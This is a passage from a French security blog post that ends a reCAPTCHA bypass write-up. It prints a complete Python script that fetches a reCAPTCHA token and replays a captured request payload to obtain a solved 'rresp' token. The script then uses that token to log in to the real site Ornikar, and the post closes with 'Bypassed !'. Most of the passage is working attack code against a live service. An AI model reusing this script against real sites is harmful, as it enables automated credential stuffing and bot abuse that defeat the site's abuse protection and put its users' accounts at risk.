dzp_VDx61z2tTeMFen9m4WVCRVsC-P_1At0amRo892yUR1G3xYdFoOhDzfiqTTGmJJsZM4bPqRXcA5MY0_YgQzvs_QoFPL1peN7mfNEmxRTgWb4eTMUcXmdU8zaKvmDYB8D9J5ghTCcOsCU2u5voKhIn9hJwX3VoHXg5FXZPoQkePR89nEX0krYZfSdqqOK73mcE6TP2Cin657wdXgNKsMjuN6XVax1xJx6q_Oc04cFhimFBq32WqEEyLt0cFiNrsmjn3Vf03Nkg_nKkoJirg0oHuAUu9rLrJJxaR5oroNAcg0EFZfjUMbllgCdyhZYK-Rr8s0T4xB6uGTNEZLYY3xAvHXZfDGdJuIL_S_saP8iPbbPfVgNnbsJfIBljmPQdKbS395612WAGOEZwclLWKIx9mQdswD43soevg5vmal4hXHwMyuQ7ttuRt1pgdx_Bwx-a0KVBaGNzomwUpi2-olwPgDOry6HzrXArItJJNjRAmvKo2V5w645EZJF_PlXClr-_Y_4rbhFlrh1XBZYpp2VPuoCDmi_gE61FDR7boslW7oSnNroQt1qAVjnjArV6O0eE9ECIJEz83T34ZVnJPusB6KZE46lYg6ouGEE_d_o857tJc2zqmCshHl0H54kg-DJgxBs0_w6aHQgbDVT-bfBiTT5EyuyrWGDpdima5z2jQQP1pIgYnDToB1cNFsri7qUsJXNOLMU6AlfF04LtuXeyt274gTl_sFg_7XWqjjOoGrfILx4j1YOoZsoTZClqoSz_J-juscokSExbA9gPvAY4Evj_manobc0eLPcWI_1ixnTTgBJXJ6tkCA09BTHdgmChW_LZoGcwk8fTauiAsP3Cae8YL9OtCSkU8Tq0clm4WFTBKq7z563xV1GSUZiPqfXvm3zCEcBQfsMtmGN2A8dMym32RJL-91ICysucjlVcgFyoREmEfFFQBi3UJBxxwkJxLjhs3LDPIoR2PeN3kLRQu_7u46NsBDVnNM04_q1re2uAflfvQeyQXhYcV6iWWZN2nqFzwkSIqaI8z50MW1hx-KL6aPYtZ6D3Y7N7K6BB2LX8gpRMeCOAtFMVLgTZMapczkNhE_9Kf_9CR0cVV6lVdRNqNCtB9sKts3_2BKJASTcOfnIrPDmmXjTpC80VBtiFJGBcuxsFCK3_zesjyF-swb7ySc18dOLzpwK91eFK6lqfYVj6dO4ckI0ruH_bPThcvnpRAkxMc95gZnlFPqFzMayZCyI0hiRJyWP4F_aGRPkaqoAFodLQUUPxAhAHCdFyD_AjxYvI*
</code></pre><p>Notre template de postdata est prête. On peut maintenant à chaque requête le token qu&rsquo;on récupère dans la réponse du GET (<em>recaptcha-token</em>)</p>
<p><img src="./img/token.png" alt="Alt text" title="token"></p>
<p>Et voila ! On récupère un recaptcha vérifié automatiquement (<em>rresp</em>)</p>
<p><img src="./img/recaptcha.png" alt="Alt text" title="recaptcha"></p>
<p>Voici un script python pour se connecter à <a href="https://www.ornikar.com/" target="_blank">Ornikar</a> :</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># -*- coding: utf-8 -*-</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> requests
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> urllib.parse
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> bs4 <span style="color:#f92672">import</span> BeautifulSoup
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> re
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">##Urls</span>
</span></span><span style="display:flex;"><span>urlGET <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://www.google.com/recaptcha/api2/anchor?ar=1&amp;k=6LcEU9EUAAAAAAuC_ndHLJkvdHXAp-pOYURWOMG5&amp;co=aHR0cHM6Ly93d3cub3JuaWthci5jb206NDQz&amp;hl=fr&amp;v=YhkYx1k-yvvb8OonJPmOpoJY&amp;size=invisible&amp;cb=ctd9gmy8wd8u&#34;</span>
</span></span><span style="display:flex;"><span>urlPOST <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://www.google.com/recaptcha/api2/reload?k=6LcEU9EUAAAAAAuC_ndHLJkvdHXAp-pOYURWOMG5&#34;</span>
</span></span><span style="display:flex;"><span>urlORNIKAR <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://auth.ornikar.com/api/v1/sign-in?app=learner-webapp&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">##Variables constantes</span>
</span></span><span style="display:flex;"><span>k <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;6LcEU9EUAAAAAAuC_ndHLJkvdHXAp-pOYURWOMG5&#34;</span>
</span></span><span style="display:flex;"><span>co <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;aHR0cHM6Ly93d3cub3JuaWthci5jb206NDQz&#34;</span>
</span></span><span style="display:flex;"><span>v <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;YhkYx1k-yvvb8OonJPmOpoJY&#34;</span>
</span></span><span style="display:flex;"><span>_chr <span style="color:#f92672">=</span> urllib<span style="color:#f92672">.</span>parse<span style="color:#f92672">.</span>quote_plus(<span style="color:#e6db74">&#34;[30,85,0]&#34;</span>)
</span></span><span style="display:flex;"><span>vh <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;12637701362&#34;</span>
</span></span><span style="display:flex;"><span>bg <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;!b2mgaSTIAAa-OPf7vjhH6qbB86JcZaQ-ACkAIwj8Rqwi-LZJH1mmOtPmiT8KKX94556Z0uUSOdyGXSMDWTujzROSuAcAAAEDVwAAAAVtAQecDRWmBBNdfn3Ady3IUrxZ6Ble-zzWoqrvYnPyRXBK_BTjJa65hFj1QhQaP_ocZu8QVh7SIsxfi3IN3DVkfWU0EvtqMUfIqz7tZ_IFtoomS3JlgW-z9sDf7O--vMnAVvnNYZDHDO9AuHB3ld9vZvld2MpTOUPFRJPSdZKDVWvSVuT5bqXq79jYHIwwfbLPoy_-90G4kR1NzVK9WFl_7GQ5ZcAMyoFCaEiDmyir1C8RaCTBOGw8cyI24zZs_4x-qalA8tCbiYfV7-WsH7JWix53_A0VQc1R6NhnCJRD16Ro3jlC9T91BZCwxtx9DL9b8gz6mpwV0LYOsTT8wCnh2AR5c3vTQ3pELYI7EqzEkxNvpi3FiocA7xwMjeUEGCEtiG1ICiEv-PmwdfEaWPwCPfNXOOjM5hT12uYlJBfLZycvQ0DehmeMCDjySXyH2YH-tQ-riwHEeBO8PjI2Yf2SlKuSNoY-Ci4LyGVPrqj4Rh4n51jhzEz0QQ44_AXl89mQcZFKbQAW9vnVGsIL45WFpag0uvlRs3j0dK2ZMWVyCIuOdetZ0G-SNotcixAbrpS9RwTeYfUOigaY6iTOvYGRRSHF5pdnqSPWIfLz2fDZtGWtSbLA2uFhT1BAfBAqKswkZNBBY3kQqDDIm8Bk_b4TRxwpnEGq3fMphWFkZejbcu2BGK7CjAolV7whs-kPE285inOf1yXzjETr4p8TiFTd5IPiZyKCLks4DQiMegA0cOYaEGDRfSP9snTZSMrOYtIdOZcU8K3hV3vaqqdEKlczlhb1fpb0ac52TUFFWN8MWaF7GGzE0v_9aLQnWDxUHsOfCNg0Q08_3ZO-dDNZV7UjU8G9IrwuAS7153boUP_R8ZiBOdCn9IkM2fUBkKrVM_XKTJ8DxAos6bw9JcU4bufblOWkxo2Wrn-swVhfuIKS86MxY0NwkFTnwv9tSX6kcK-NbVoFfS_z25j4jDIfLmcOxHX3BRb7YAeGOB_6Ry7KNDEU782jts0NaPbvJIEgb5mCdB6eeaqPIEm-uZiOlxz-J4QMNHyxqe_bHbCuTMNYir39WWJ--Wtz1Zev0VsmCEtmDSWBefGhgi3fdOt8CG-kBROGph4rdLmb4EZ1M1hazm933qOcQGAwZS1qRSVMr_YtulAIcjsFfGZPxQtI_ZLzJwGACYJznVlvkfDzkvL6PUo4tuIgY98MLmHJ7WBTzXKysRJy7d5H5dvQCi5hTQITDh5UuBznHEf65pbZ8DkWfSzw9iqTMFdX7FecfCDTRoPFsA5Shpmi9HHvDcV5JTi1h_4qQPQhmAWO6GLc_tjwo3UZGwXQdeP1dsnIgHmbbVkz39mY1tT5OfDzgeQkDfn11kLYccyC7iDAXeZ-tyXMZ-_QQB3YIQ0p0XWKjpVrLlOchGjSXyolaP6zvrFgf5r47zXIJrE8zRhZw07jwxl-FBDWXiFYiXQcRcOE1gQjC80EwTusghjfjtxW_oRrVRV9te1R2medk5nkLDylBSPXsU4c7LtDRtoFA16kwfFcfJY0IbmwCJRXkCvAW4o1xJVA1ZVNWxcGI4_IOSdVHgCFI8VEZ9fcb_NpezU4VOt0wGz_OJjkMkTrmfqnfpXSDBw4zSjOikz-vapJCKLhrhE7TPBkutHKF-f_4AjM7o52KW-Cwb0nWx28BTminpxiyHomUPO1f17kHHRfgkxOdbhM_qA9Yz5_xHwER63NTsk5082IPGAv41jrYTjnawD0PPBe8Pzjzlkn0EvakutCPu2pNz4fFMRgjaTzrh-aFIVzDdzLHiUI2OTWtJYYZS7iPl5IFM26Ca341u5LotOVRKidG4pBfdY257ZVLHJp5LqKgMw4jRZ5vtroPnYT_G6zgQ1VubnHKJHClBJrbcWr06UHsMjEl2CSCzhT5sQ3wAD0Qv7uJLoAq7mFliwLEaQynunyvYOo3QgPHhQkada7vV7dCqv7XvTOqqmpBPk1yzILAPvGEJ3UwtEFYgSb2QEw31R2pmmiYYAvR8JUiddkVZabreguWDb3UNHiC4kyT8LO9v5cnTEGcbzpCxELSpWS3GIEAr_sfukhpy8SauDGT0PR3uApJ8UM5nLsMDMIN7Oi-G1n0oaca0nRVcobOrPqAPQayk13UoDSO1r0K9Wf8ttKAB12tuyDIn4e6DGyZkDg_21yXezFGEM8EXpUafUVqzoLglwUBcsp3p_4iTZuhcr5OxLZGdubzuGnXFctm_EakPF9zjYWAZ1eUzXs3dofYP12qBetvpVjKfyXj__tVFxVYuN1pJMGdZ0LCL55qZ6T3oaPy40JnadzGowsoEUwEeQGxG-1A5vjYuXaTOvL4YzKptUmcN_b-oqvEW8eBhLL0ek_1hJ3ZAbiVFPdlPFiurMCIvqR2BCyBZjqi5I8QWwp2KlcQp8Dzf76d_X821tSSHTDCndOB91txj1wU_ZOj4BJks2wu09v6T90nxZDwV9QzxEcxCivzRVv62osFjDv2Y_7_y-A-sAy08eDc80uLTYfA4zdSKTB_A5QIZn6WnT3mpyWLQ9bmFGEeJ_rJELY9mOo2cuAaJSNp7slsn0QN7wgoer-GPZSJ60JcW_UdHw0tFPuMTpZBZAGbaIWq7gkk8hAw0ifcaJA1HJcDwrVPCs705tGa5dW0c7rsWVNUIGVzJkvKy8WBz8ZGxlz6X0nMbuxIHVz5JGqcj1aQv_1BLnK62zjSndRNFGe8GsbgdO2i93zC_t2Nzd0IP9H3qSbcChKwAT8KYAcfPYbl9mT1LaGakczgRwoLh5HKb47ouMm_BkEhCaJ2t4jMK415POfPzPVsMBTqNfAlW61pgKtGBZAj6vJyecotQSC4yg-xAnm2EOnmv1Gv636z3d7KzyCI-McD3UE_iK2sfpXE2ePNGvJN06y0QgodGEPWWN46gQ6AmRRdAXC_3JM8BkiBASeaaN4L0kgiR9g9eaDaz57wdZCzdVWJbfvvlpRk_EqrEXK786OMTJ_4lGPoPNliHtmESsd5YDtwuf3d6rkqcOYde7mpC1yO6djhbJooVwwwR6w0c1TFA0IPFIojXe5-zoZfIhIM-1gQyfGLaWOf37rNhdwZEqkjG1itXgtHoknPsX_lO5F_VnCqYys6Zt_x_HlBQGm1U6jUnBzSBs2MbrszNhPVgSV5Aai9O3Lg2hTVdz8VVksYikWpslq_rnmgr4NniK1UUZE-nQqtr_PG8T5-NwXt9l0sQRDB3OPV7Da7A5gfYv_8iSMDwHs8AjQZ3WXxxcEkFGAD1_O4f8kyLDvbv5TLJz_JAOzx17HL6VPh_SCbPU77EnPkNH4uLsXdx58LXiB-7Vglx_RAmVNPttogge6rEoQgkavefKvaC1tTwkFzwjT1RqefrNUvvVBT4aEshtBeO41a9XAvaudBKYctfduPNQf31NdHLntiOnuEsatCDE1ILrmQK0SdlonKEYrQw3HeMAQdazsUO760WJ5wxHy1AWWNfje7rRiYprKk_B1seFIwhiBk9_ajJiVGW6MXYKZo3pPPXq9Texu89bscvhDR5H0-sl0yOoW8MonMT-OPINN11RwJqexjRwbJ-iajXuIzxS0u1zIikcWJAhaf4ZdYeG5IDG8Ql7A370ud3p5_pviDXiuGXrN3mC9uyNJVILQiDbNLklGSOfWPm5B1cO6X_7VZkglvUKUlk-_Q0jAishk8Hh65M9KtvPRJl0yuHo5nD4Z01AdRhCFTbWlkDVwwPTBG8Jo3QcVD8SgfyKr11vt1zkchqBi2Ml0EvWF_NZqksu4_Smh1eWj_a7M2_B5h3cMKnb6n8-BWoWQ8g39n7lNp_v5sG5uohUlLNBenKGXbZWN7zrsGjz9pgez4XRlwX-b6qva1Utz4KkSi3Au7j0YKe2PU2Lo4RNBcMRWOjqz9IMDYdSfpDG3AOUenRqft0yg8cPma9a5iJBFfBLjUR7YCgJJ0thHUHKFHUI1VhCCAno_haOTpB2aaeV8-bPl5GhU7fyIZ62Woo9ElL2rbYCe8YbfYysGygxFpzjJjfB3BvXXTIbGlZ1On_Ag73nyacfbuuR889k6xG2j7FEVs4yACuqfqjmcxA9mUqXSkXy-zCEx6IPQkmC9UddYszqm4oMJUdLPPm5Ve80wTZVF5FpPLMQT9vrM4OvTlTEfqcVbh_ephS4ql7vyoUFfQlUD8JNizOMExUXW4VkkW9bfHImFW3Z-EX9dR2NdW1_eqvF4W0-ABwzz_u1_LMm6C6ya7gdg638abQ6nzX4vspEXOOujuj00m6kZQq-jf6ak4mqAiG4Te9hXYZ0QQ6spEakSSz8SKmPPxwbfjkuumwCYyoBoJiarszJwgaAYB68VT4gCICKi3VdaMoEzff4R__axLPyFn_o7C5InJY4-HlftGLa2iISStuo6iQqgdQFVGflv6lDcbTAtCSW2MP_W-qZBgLezU4lrw6amFUH2dzxUhHIsmg5iqqiWHTKc*&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Token Variable</span>
</span></span><span style="display:flex;"><span>r1 <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(urlGET)<span style="color:#f92672">.</span>text
</span></span><span style="display:flex;"><span>token <span style="color:#f92672">=</span> BeautifulSoup(r1, <span style="color:#e6db74">&#39;html.parser&#39;</span>)<span style="color:#f92672">.</span>input[<span style="color:#e6db74">&#34;value&#34;</span>]
</span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;TOKEN :&#34;</span><span style="color:#f92672">+</span>token<span style="color:#f92672">+</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>postdata <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;v&#34;</span>:v,
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;reason&#34;</span>:<span style="color:#e6db74">&#34;q&#34;</span>,
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;c&#34;</span>:token,
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;k&#34;</span>:k,
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;co&#34;</span>:co,
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;hl&#34;</span>:<span style="color:#e6db74">&#34;en&#34;</span>,
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;size&#34;</span>:<span style="color:#e6db74">&#34;invisible&#34;</span>,
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;chr&#34;</span>:_chr,
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;vh&#34;</span>:vh,
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;bg&#34;</span>:bg
</span></span><span style="display:flex;"><span>	}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Token Recaptcha Final</span>
</span></span><span style="display:flex;"><span>r2 <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>post(urlPOST , data<span style="color:#f92672">=</span>postdata)<span style="color:#f92672">.</span>text
</span></span><span style="display:flex;"><span>recaptcha <span style="color:#f92672">=</span> re<span style="color:#f92672">.</span>search(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#39;\[\&#34;rresp\&#34;,\&#34;(.*?)\&#34;,null,120&#39;</span>, r2)<span style="color:#f92672">.</span>group(<span style="color:#ae81ff">1</span>)
</span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;RECAPCHA-TOKEN :&#34;</span><span style="color:#f92672">+</span>recaptcha<span style="color:#f92672">+</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Login Ornikar</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>postOrnikar <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;email&#34;</span>:<span style="color:#e6db74">&#34;RecaptchaBypassIsEz@gmail.com&#34;</span>,
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;password&#34;</span>:<span style="color:#e6db74">&#34;SuperPassword123!&#34;</span>,
</span></span><span style="display:flex;"><span>	<span style="color:#e6db74">&#34;_token&#34;</span>:recaptcha
</span></span><span style="display:flex;"><span>	}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>r3 <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>post(urlORNIKAR,json<span style="color:#f92672">=</span>postOrnikar)<span style="color:#f92672">.</span>text
</span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;RESPONSE :&#34;</span><span style="color:#f92672">+</span>r3<span style="color:#f92672">+</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
</span></span></code></pre></div><p>Disponbible <a href="./files/ornikar.py">ici</a></p>
<p>Et le résultat :</p>
<p><img src="./img/final.png" alt="Alt text" title="final"></p>
<p>Bypassed !</p>
<p><img src="./img/meme2.gif" alt="Alt text" title="meme2"></p>

  
  <hr>
<div class="footer">
    
	    
            <a class="previous-post" href="//localhost:1313/posts/pourquoi-votre-wifi-est-vuln%C3%A9rable/?ref=footer"><span style="font-weight:bold;">« Previous</span><br>Comment casser un mot de passe Wifi</a>
        
	    
            <div class="next-post">
                <a href="//localhost:1313/posts/les-captchas-sont-inutiles-part2/?ref=footer"><span style="font-weight:bold;">Next »</span><br>Comment Isoler un Recaptcha</a>
            </div>
        
    
</div>

  
</div>
            </main>
            
  
    <div class="article-toc ">
    <div class="toc-wrapper">
      <h4 id="contents"></h4>
      <nav id="TableOfContents">
  <ul>
    <li><a href="#introduction">Introduction</a></li>
    <li><a href="#reconnaissance">Reconnaissance</a></li>
    <li><a href="#exemple">Exemple</a></li>
    <li><a href="#bypass">Bypass</a></li>
  </ul>
</nav>
    </div>
</div>

  

        </div>
    </body>
</html>
